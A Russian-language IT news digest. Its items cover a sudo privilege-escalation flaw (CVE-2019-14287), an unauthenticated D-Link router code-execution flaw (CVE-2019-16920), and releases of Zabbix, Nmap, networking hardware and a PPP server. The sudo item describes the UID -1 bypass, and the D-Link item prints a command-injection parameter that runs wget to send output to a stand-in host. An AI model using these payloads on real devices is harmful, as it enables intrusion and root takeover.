В утилите Sudo, используемой для организации выполнения команд от имени других пользователей, выявлена уязвимость (CVE-2019-14287), которая позволяет добиться выполнения команд с правами root, при наличии в настройках sudoers правил, в которых в секции проверки идентификатора пользователя после разрешающего ключевого слова "ALL" следует явный запрет запуска с правами root ("... (ALL, !root) ..."). В конфигурациях по умолчанию в дистрибутивах уязвимость не проявляется.

При наличии в sudoers допустимых, но крайне редко встречающихся на практике правил, разрешающих выполнение определённой команды под UID-идентификатором любого пользователя, кроме root, атакующий, имеющий полномочия выполнения данной команды, может обойти установленное ограничение и выполнить команду с правами root. Для обхода ограничения достаточно попытаться выполнить указанною в настройках команду с UID "-1" или "4294967295", что приведёт к её выполнению с UID 0.
После 6 месяцев разработки доступна новая версия системы мониторинга Zabbix 4.4, код которой распространяется под лицензией GPLv2. Zabbix состоит из трёх базовых компонентов: сервера для координации выполнения проверок, формирования проверочных запросов и накопления статистики; агентов для осуществления проверок на стороне внешних хостов; фронтэнда для организации управления системой.

Для снятия нагрузки с центрального сервера и формирования распределённой сети мониторинга может быть развёрнута серия прокси-серверов, агрегирующих данные о проверке группы хостов. Данные могут храниться в СУБД MySQL, PostgreSQL, TimescaleDB, DB2 и Oracle. Без агентов Zabbix-сервер может получать данные по таким протоколам как SNMP, IPMI, JMX, SSH/Telnet, ODBC, проводить тестирование доступности Web-приложений и систем виртуализации.
В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр
 
ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)
Специалисты Национального института стандартов и технологий США (US National Institute for Standards and Technology, NIST) работают над технологией защиты от перехвата BGP, базирующейся на искусственном интеллекте.

Border Gateway Protocol (BGP) является ключевым протоколом интернета, к сожалению, открытым для злоупотребления. Злоумышленники могут с легкостью заставить сети передавать трафик туда, куда им нужно с целью слежения за пользователями, фишинга и пр. Хотя во многих случаях переадресация трафика происходит случайно из-за технических ошибок, за последние несколько лет злоумышленники не раз злоупотребляли BGP в крупномасштабных атаках.

Утечка маршрутов BGP происходит, когда оператор сети ошибочно объявляет блок IP-адресов другой сети. Проблема заключается в том, что определить, произошел инцидент случайно или кто-то вызвал утечку намеренно, невозможно. Даже если все указывает на злонамеренность, трафик может идти по неверному маршруту в течение нескольких часов, пока ситуация не будет исправлена.
Как стало известно, Intel в ближайшем времени представит новое поколение недорогих Ethernet-контроллеров для материнских плат и ноутбуков потребительского сегмента со скоростью передачи данных 2,5 Гбит/с.

Микросхемы PHY называются Intel i225-LM / i225-V 2.5G и носят кодовое обозначение Foxville. Таким образом компания начнет внедрять решения 2,5 Гбит/с в качестве основного стандарта проводных сетей в клиентском секторе после почти 15 лет доминирования контроллеров со скоростью 1 Гбит/с.

Ожидается, что контроллеры Intel Intel i225-LM / i225-V будут представлены совместно с материнскими платами LGA2066 для HEDT-процессоров Cascade Lake-X и платами LGA1200 для настольных процессоров Comet Lake-S.

Упоминания о контроллерах Ethernet 2.5G уже обнаружены в свежих обновлениях ядра Linux. Чипы Intel i225-V работают через стандартный разъем Ethernet, и что более важно совместимы с существующими кабелями стандартов CAT5E / CAT6. Благодаря этому переход на новый стандарт должен пройти быстро и безболезненно для рядовых пользователей. 
Принадлежащая Cisco компания Acacia на днях продемонстрирует новую систему, способную повысить скорость передачи сигнала по оптоволокну на одной длине волны до 1,2 Тбит/с — это вызвано необходимостью повысить пропускную способность сетей, чтобы удовлетворить ненасытные потребности облачных дата-центров

Предельная волоконно-оптическая скорость передачи данных на одной длине волны сделает ощутимый скачок в этом месяце. Компания Acacia Communications, принадлежащая теперь Cisco, заявила, что покажет решение, способное передавать данные со скоростью 1,2 терабита в секунду.
Идея создания накопителей данных с прямым  Ethernet-подключением появилась несколько лет назад. И в этом году, в рамках мероприятия Flash Memory Summit 2019, компании Toshiba и Marvell показали рабочий образец твердотельного накопителя с поддержкой подключения NVMe-oF (NVMe over Fabric).
 
Представленный накопитель построен на 96-слойных микросхемах памяти 3D NAND компании Toshiba (BiSC NAND), а в его основе лежит новый чип Marvell 88SS5000, разработанный специально для таких устройств. В данном решении компания Marvell объединила сетевой контроллер и контроллер для твердотельного накопителя.
Компания D-Link представляет новую линейку управляемых гигабитных коммутаторов DGS-1210/FL. Новые коммутаторы построены на платформе популярной линейки DGS-1210/F, поддерживают полнофункциональное CLI-управление и оснащены встроенной защитой портов от статического электричества до 6 кВ.
DGS-1210/FL предназначены для применения на уровне доступа в корпоративных сетях с повышенными требованиями к соотношению функциональных возможностей и стоимости оборудования, в т.ч. вычислительных сетях государственных организаций, ведомственных и коммерческих структур, учреждений здравоохранения, образования и культуры, предприятий малого и среднего бизнеса.
 
Линейки коммутаторов DGS-1210/FL и DGS-1210/F рекомендуются к использованию в текущих и перспективных проектах.
 
В новую линейку DGS-1210/FL входят 10 моделей в следующей аппаратной конфигурации:
DGS-1210-10/FL 8 портов 10/100/1000Base-T и 2 порта SFP
DGS-1210-10P/FL 8 портов 10/100/1000Base-T и 2 порта SFP 1 – 8 c поддержкой 802.3af/at PoE, 65 Вт
DGS-1210-10MP/FL 8 портов 10/100/1000Base-T и 2 порта SFP 1 – 8 c поддержкой 802.3af/at PoE, 130 Вт
DGS-1210-20/FL 16 портов 10/100/1000Base-T и 4 комбо-порта 100/1000Base-T/SFP
DGS-1210-26/FL 24 порта 10/100/1000Base-T и 2 порта SFP
DGS-1210-28/FL 24 порта 10/100/1000Base-T и 4 комбо-порта 100/1000Base-T/SFP
DGS-1210-28P/FL 24 порта 10/100/1000Base-T и 4 комбо-порта 100/1000Base-T/SFP 1 – 24 c поддержкой 802.3af/at PoE, 193 Вт
DGS-1210-28MP/FL 24 порта 10/100/1000Base-T и 4 комбо-порта 100/1000Base-T/SFP 1 – 24 c поддержкой 802.3af/at PoE, 370 Вт
DGS-1210-52/FL 48 портов 10/100/1000Base-T и 4 комбо-порта 100/1000Base-T/SFP
DGS-1210-52MP/FL 48 портов 10/100/1000Base-T и 4 комбо-порта 100/1000Base-T/SFP 1 – 48 c поддержкой 802.3af/at PoE, 370 Вт
Спустя почти полтора года с момента прошлого выпуска представлен релиз сканера сетевой безопасности Nmap 7.80, предназначенного для проведения аудита сети и выявления активных сетевых сервисов. В состав включено 11 новых NSE-скриптов для обеспечения автоматизации различных действий с Nmap. Обновлены базы сигнатур для определения сетевых приложений и операционных систем.

Последнее время основная работа была сосредоточена на усовершенствовании и стабилизации библиотеки Npcap, развиваемой для платформы Windows в качестве замены WinPcap и использующей современный Windows API для организации захвата пакетов. Много мелких улучшений внесено в движок Nmap Scripting Engine (NSE) и связанные с ним библиотеки. В Nsock и Ncat добавлена поддержка сокетов с адресацией AF_VSOCK, работающих поверх virtio и используемых для взаимодействия между виртуальными машинами и гипервизором. Реализовано определение сервиса adb (Android Debug Bridge), включенного по умолчанию на многих мобильных устройствах.
Объявлен релиз высокопроизводительного PPTP/L2TP/SSTP/PPPoE/IPoE сервера под Linux. В релиз вошли последние коммиты, с внедрением которых не было выявлено проблем в эксплуатации. Из интересного:
  • исправлена ошибка падения сервера при восстановлении доступа к Radius серверу
  • для ipoe добавлен атрибут weight для балансировки
  • для cli добавлена возможность входа по паролю -P, --password
  • для cli в show sessions добавлена network namespace
  • для cli в show sessions добавлен вывод продолжительности сессии в секундах
Интересного достаточно, остальное ниже: